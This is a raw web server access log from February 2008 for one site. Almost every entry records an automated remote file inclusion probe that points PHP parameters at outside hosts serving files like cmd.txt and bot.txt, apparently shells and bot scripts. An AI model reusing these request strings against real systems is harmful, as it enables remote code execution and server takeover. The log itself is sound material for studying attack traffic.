209.85.107.22 - - [22/Feb/2008:07:54:33 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:07:54:39 -0800] "GET //skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:07:54:46 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [22/Feb/2008:07:54:55 -0800] "GET /logs/access_080211.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [22/Feb/2008:07:54:55 -0800] "GET /logs/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.160.11.72 - - [22/Feb/2008:07:54:56 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:07:55:13 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
74.52.27.146 - - [22/Feb/2008:07:55:16 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.19.144.26/go.do?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:07:55:33 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:07:55:34 -0800] "GET //skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:07:55:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.16.96.219 - - [22/Feb/2008:07:55:36 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://rtfmsoft.com/gallery2/g2data/locks/9/2/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.52.236.0 - - [22/Feb/2008:07:55:59 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.zezaku.extra.hu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:56:08 -0800] "GET /logs/access_080126.log/include/statistic.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:56:09 -0800] "GET /include/statistic.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:56:09 -0800] "GET /logs/include/statistic.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:56:28 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:56:28 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:56:28 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.160.6 - - [22/Feb/2008:07:56:28 -0800] "GET /logs/access.log//errors.php?error=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.197.160.6 - - [22/Feb/2008:07:56:29 -0800] "GET /logs//errors.php?error=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:56:52 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:56:52 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:56:52 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.79.75.195 - - [22/Feb/2008:07:56:59 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:57:12 -0800] "GET /logs/access_080126.log/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:57:13 -0800] "GET /include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:57:13 -0800] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:25 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:25 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:25 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:07:57:31 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.139 - - [22/Feb/2008:07:57:31 -0800] "GET /logs/access_071219.log HTTP/1.0" 200 181961 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:31 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:31 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:31 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:31 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:32 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:32 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.26.207 - - [22/Feb/2008:07:57:34 -0800] "GET /logs/access_071224.log HTTP/1.0" 200 205925 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:07:57:36 -0800] "GET //skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:07:57:38 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [22/Feb/2008:07:57:41 -0800] "GET /logs/access_080201.log/index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:41 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:42 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:42 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:43 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:43 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:43 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:57:48 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:57:48 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:57:49 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:49 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:57:49 -0800] "GET /logs/access_080201.log/lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:49 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:07:57:49 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:57:49 -0800] "GET /lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:57:50 -0800] "GET /logs/lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.214.232 - - [22/Feb/2008:07:58:02 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:04 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:04 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:04 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:06 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:06 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:06 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.130.79.84 - - [22/Feb/2008:07:58:24 -0800] "GET /logs/access.log//admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.84 - - [22/Feb/2008:07:58:24 -0800] "GET //admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.84 - - [22/Feb/2008:07:58:24 -0800] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:35 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:58:35 -0800] "GET /logs/access_080126.log/include/Classes.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:35 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:36 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:58:36 -0800] "GET /include/Classes.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:58:36 -0800] "GET /logs/include/Classes.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:55 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:55 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:58:55 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:59:09 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:59:09 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:07:59:09 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:59:10 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:59:11 -0800] "GET //update/update5.php?lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.31.156.195 - - [22/Feb/2008:07:59:16 -0800] "GET /logs//update/update5.php?lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:59:37 -0800] "GET /logs/access_080126.log/include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:59:38 -0800] "GET /include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:07:59:38 -0800] "GET /logs/include/status.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:07:59:49 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.130.79.84 - - [22/Feb/2008:07:59:52 -0800] "GET /logs/access.log//admin/classes/TplLoad.php?full_path_to_public_program=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.84 - - [22/Feb/2008:07:59:52 -0800] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.84 - - [22/Feb/2008:07:59:52 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:08:00:00 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [22/Feb/2008:08:00:02 -0800] "GET /index.php?option=com_bsq_sitestats&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:08:00:16 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:00:33 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:00:34 -0800] "GET //update/update5.php?lang=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.90.206.110 - - [22/Feb/2008:08:00:35 -0800] "GET /logs//update/update5.php?lang=http://www.uptours.com/ekstras/images/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [22/Feb/2008:08:00:48 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:08:01:01 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.160.33.164 - - [22/Feb/2008:08:01:12 -0800] "GET /logs/access_071230.log//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://CMD/r7?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:08:01:15 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.87.139.98 - - [22/Feb/2008:08:01:15 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:01:15 -0800] "GET /logs/access_080201.log//update/update5.php?lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:01:16 -0800] "GET //update/update5.php?lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:08:01:17 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.144.192.118 - - [22/Feb/2008:08:01:17 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://warez4warez.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:01:21 -0800] "GET /logs//update/update5.php?lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:01:27 -0800] "GET /logs/access_080126.log/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:01:28 -0800] "GET /include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:01:37 -0800] "GET /logs/include/status_top_x.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.26.168 - - [22/Feb/2008:08:02:11 -0800] "GET /logs/access_070922.log HTTP/1.0" 200 143145 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.130.79.84 - - [22/Feb/2008:08:02:16 -0800] "GET /logs/access_080211.log//admin/business_inc/saveserver.php?thisdir=http://assassinscreed.altervista.org/forum/avatars/Musicians/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:02:20 -0800] "GET /logs/access_080201.log/lang=http://www.uptours.com/ekstras/images/bot.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:03:11 -0800] "GET /logs/access_080126.log/include/statistic.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:03:12 -0800] "GET /include/statistic.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [22/Feb/2008:08:03:12 -0800] "GET /logs/include/statistic.inc.php?tm_includepath=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [22/Feb/2008:08:03:21 -0800] "GET /logs/access_080201.log/lang=http://www.uptours.com/ekstras/images/bypass2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
